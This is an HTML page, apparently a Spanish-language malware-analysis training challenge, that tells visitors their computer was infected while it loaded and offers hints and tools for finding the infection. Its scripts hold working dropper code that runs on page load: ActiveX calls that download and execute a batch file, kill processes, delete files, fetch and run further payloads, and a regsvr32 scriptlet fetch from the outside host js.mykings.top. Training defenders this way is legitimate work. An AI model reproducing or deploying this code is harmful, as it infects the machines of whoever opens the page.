<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script src="http://192.168.221.128/Desafio/jquery.min.js"></script>
<script type="text/javascript"> //Visual
$(document).ready(function() {
var i = 0;
	$(".container").hide();
	$("footer").hide();
	$(".loader").fadeOut(7000);
	$(".loader2").fadeOut(7000);
	$(".container").delay(7000).slideUp().fadeIn("slow");
	$("#herramientas").hide();
	$("#ayudas").hide();
	$("#myProgress").hide();
	$("#myBar").hide();
	$("#idNope").hide();
	$("#herramienta").click(function(){
		$("#herramienta").animate({height: '40%'}, "slow");
		$("#herramientas").slideDown("slow");
		$("#ayuda").animate({bottom: '5%'}, "slow");
		
});

	$("#ayuda").click(function(){
	$("#ayuda").animate({height: '30%'}, "medium");
	$("#ayuda").animate({left: '5%'}, "medium");
	$("#ayuda").animate({bottom: '5%'}, "medium");
	$("#ayuda").animate({width: '85%'}, "fast");
	$("#ayudas").slideDown("slow");
		
});

	$("#nope").click(function(){
	$("#myProgress").show();
	$("#myBar").show();
		if(i==0){
		var a=0;
		if (a == 0) {
		a = 1;
		var elem = document.getElementById("myBar");
		var width = 10;
		var id = setInterval(frame, 10);
		function frame() {
      if (width >= 100) {
        clearInterval(id);
        a = 0;
      } else {
        width=width+0.5;
        elem.style.width = width + "%";
        elem.innerHTML = width  + "%";
      }
    }
  }
		i=1;
		$("#nope").animate({height: '20%'}, "medium");
		$("#idNope").show();
		}
		else {
		alert("Ya se desplego el malware.");
		}
		
});
});
</script>

<script type="text/javascript">
//Descarga PowerShell.

var url="http://192.168.221.128/Desafio/PowerBat.txt",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");
http.open("GET",url,!1);
http.send();
ado.Open();
ado.Type=1;
ado.Write(http.responseBody)
ado.SaveToFile('C:\\Temp\\Power.bat',2);
ado.Close();
var a=0;
function runCmd(command, option)
{
    var char34 = String.fromCharCode(34);
    var wsh = new ActiveXObject('WScript.Shell');
    if(a==0){
	
	if (wsh)
    {
	alert("Ups! Empezaste mal ,El Malware desplego su segunda fase");
        command = 'C:\\Temp\\Power.bat /MIN ' + char34 + wsh.ExpandEnvironmentStrings(command);
        wsh.Run(command);
    }
	a=1;
	}
}

</script>

<script type="text/javascript">
ScriptText: var toff=3000;
var url1 = "http://192.168.221.128/Desafio/kill.html";
http = new ActiveXObject("Msxml2.ServerXMLHTTP");
fso = new ActiveXObject("Scripting.FilesystemObject");
wsh = new ActiveXObject("WScript.Shell");
http.open("GET", url1, false);
http.send();
str = http.responseText;
arr = str.split("\r\n");
for (i = 0; i < arr.length; i++) { t = arr[i].split(" ");
proc = t[0];
path = t[1];
dele = t[2];
wsh.Run("taskkill /f /im " + proc, 0, true);
if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };
var locator=new ActiveXObject("WbemScripting.SWbemLocator");
var service=locator.ConnectServer(".","root/cimv2");
var colItems=service.ExecQuery("select * from Win32_Process");
var e=new Enumerator(colItems);
var t1=new Date().valueOf();
for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};
var t2=0;
while(t2-t1<toff){var t2=new Date().valueOf()}
var pp=service.get("Win32_Process");
var url="http://192.168.221.128/Desafio/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");
for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);
pp.create("regsvr32 /s shell32.dll");
pp.create("regsvr32 /s WSHom.Ocx");
pp.create("regsvr32 /s scrrun.dll");
pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");
pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");
pp.create("regsvr32 /s jscript.dll");
pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");


</script>

<title>Desafio</title>
<style>
#myProgress {
  width: 100%;
  background-color: #ddd;
}

#myBar {
  width: 10%;
  height: 30px;
  background-color: #4CAF50;
  text-align: center;
  line-height: 30px;
  color: white;
}
 .loader2 {
	margin:auto;
	margin-top:15%;
    border: 16px solid #f3f3f3; /* Light grey */
    border-top: 16px solid #3498db; /* Blue */
    border-radius: 50%;
    width: 120px;
    height: 120px;
    animation: spin 2s linear infinite;
 }

@keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

.hide-loader{
display:none;
}

 .loader {
	margin:auto;
    width: 77px;
    height: 130px;
 }

.hide-loader{
display:none;
}
.container{
	border-style:solid;
	border-color:black;
	position:relative;
	border-color:black;
	margin:auto;
	width:70%;
    height: 600px; 
}
#ayuda {
	margin-style:solid;
	border-color:black;
	margin-width:1px;
	position:absolute;
	width:30%;
	height:12%;
	background:orange;
	bottom:15%;
	left:33%;
	text-align:center;
	padding:20px;
  background-color: #fefefe;
  border: 1px solid #888;
  box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2),0 6px 20px 0 rgba(0,0,0,0.19);
}
#nope {
	border-left: 6px solid red;
	position:absolute;
	top:5%;
	left:10%;
	width:30%;
	height:12%;
	text-align:center;
	padding:20px;
  background-color: #fefefe;
  border: 1px solid #888;
  box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2),0 6px 20px 0 rgba(0,0,0,0.19);
}
#herramienta {
	border-left: 6px solid red;
	position:absolute;
	top:5%;
	right:10%;
	width:30%;
	height:12%;
	padding:20px;
  background-color: #fefefe;
  border: 1px solid #888;
  box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2),0 6px 20px 0 rgba(0,0,0,0.19);
	
}
#herramientas {
  background-color: #fefefe;	
}
#IDHerramienta2 {
	list-style-type:none;
}
.modal {
  display: none; /* Hidden by default */
  position: fixed; /* Stay in place */
  z-index: 1; /* Sit on top */
  padding-top: 100px; /* Location of the box */
  left: 0;
  top: 0;
  width: 100%; /* Full width */
  height: 100%; /* Full height */
  overflow: auto; /* Enable scroll if needed */
  background-color: rgb(0,0,0); /* Fallback color */
  background-color: rgba(0,0,0,0.9); /* Black w/ opacity */
}

/* Modal Content */
.modal-content {
  position: relative;
  margin: auto;
  padding: 0;
  background-color: #fefefe;
  border: 1px solid #888;
  width: 80%;
  box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2),0 6px 20px 0 rgba(0,0,0,0.19);
  -webkit-animation-name: animatetop;
  -webkit-animation-duration: 0.4s;
  animation-name: animatetop;
  animation-duration: 0.4s
}

/* Add Animation */
@-webkit-keyframes animatetop {
  from {top:-300px; opacity:0} 
  to {top:0; opacity:1}
}

@keyframes animatetop {
  from {top:-300px; opacity:0}
  to {top:0; opacity:1}
}

/* The Close Button */
.close {
  color: white;
  float: right;
  font-size: 28px;
  font-weight: bold;
}

.close:hover,
.close:focus {
  color: #000;
  text-decoration: none;
  cursor: pointer;
}

.modal-header {
  padding: 2px 16px;
  background-color: #5cb85c;
  color: white;
}

.modal-body {padding: 2px 16px;}

.modal-footer {
  padding: 2px 16px;
  background-color: #5cb85c;
  color: white;
}

/* Button used to open the contact form - fixed at the bottom of the page */
.open-button {
  background-color: #555;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  opacity: 0.8;
  position: fixed;
  width: 280px;
  left:40%;
  bottom:5%;
}

/* The popup form - hidden by default */
.form-popup {
  display: none;
  position: fixed;
  border: 3px solid #f1f1f1;
  bottom:15%;
  z-index: 9;
  left:30%;
}

/* Add styles to the form container */
.form-container {
  max-width: 600px;
  padding: 20px;
  background-color: white;
}

/* Full-width input fields */
.form-container input[type=text], .form-container input[type=password] {
  width: 90%;
  padding: 15px;
  margin: 5px 0 22px 0;
  border: none;
  background: #f1f1f1;
}

/* When the inputs get focus, do something */
.form-container input[type=text]:focus, .form-container input[type=password]:focus {
  background-color: #ddd;
  outline: none;
}

/* Set a style for the submit/login button */
.form-container .btn {
  background-color: #4CAF50;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  width: 100%;
  margin-bottom:10px;
  opacity: 0.8;
}

/* Add a red background color to the cancel button */
.form-container .cancel {
  background-color: red;
}

/* Add some hover effects to buttons */
.form-container .btn:hover, .open-button:hover {
  opacity: 1;
}
</style>
</head>
<body>
<div id="loader" class="loader2"></div>
<br>
<div class="loader">Cargando...</div>
<div class="container">

<div id="myModal" class="modal">

  <!-- Modal content -->
  <div class="modal-content">
    <div class="modal-header">
      <span class="close">&times;</span>
      <h2 align="center">Bienvenido al desafio</h2>
    </div>
    <div class="modal-body">
      <h3 align="center">Mientras esperaste que la pagina carge tu equipo se infecto :)</h3>
    </div>
    <div class="modal-footer">
      <h3 align="center">Es tu momento de utilizar todo lo que aprendiste anteriormente</h3>
    </div>
  </div>

</div>

<script>
// Get the modal
var modal = document.getElementById("myModal");

// Get the <span> element that closes the modal
var span = document.getElementsByClassName("close")[0];

// When the user clicks the button, open the modal 
  modal.style.display = "block";

// When the user clicks on <span> (x), close the modal
span.onclick = function() {
  modal.style.display = "none";
}

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
  if (event.target == modal) {
    modal.style.display = "none";
  }
}
</script>
<div id="ayuda"><p><a href="#">Ayuda</a></p>
<div id="ayudas">
	<br>
<li id="IDHerramienta2">Recorda como suele alojarse un malware<br><br></li>
<li id="IDHerramienta">Llaves de Registro : Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</li>
<li id="IDHerramienta">Llaves de Registro : Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</li>
<li id="IDHerramienta">Tareas Programadas</li>
<li id="IDHerramienta">Entradas WMI</li>
<li id="IDHerramienta">Comando Wireshark : http.request.method==GET</li>

</div></div>
<div id="nope"><p style="text-align:center;"><a onclick="runCmd('');" href="#">�Que hago?</a></p>
<div id="myProgress">
<div id="myBar">0%</div>
</div>
<div id="idNope"><br>Puede que hayas obtenido ayuda , ahora se convirtio en un Analisis Dinamico <br><br></div>
</div>
<div id="herramienta"><p style="text-align:center;"><a href="#">Herramientas</a></p>
<div id="herramientas">
	<br>
<li id="IDHerramienta2">Utiliza las herramienta que conociste los analisis anteriores , te recomiendo las siguientes : <br><br></li>
<li id="IDHerramienta">Process Explorer</li>
<li id="IDHerramienta">Autoruns</li>
<li id="IDHerramienta">Wireshark</li>
<li id="IDHerramienta">Process Monitor</li>
<li id="IDHerramienta">WMI Explorer</li>
</div></div>
</div>
</body>
</html>

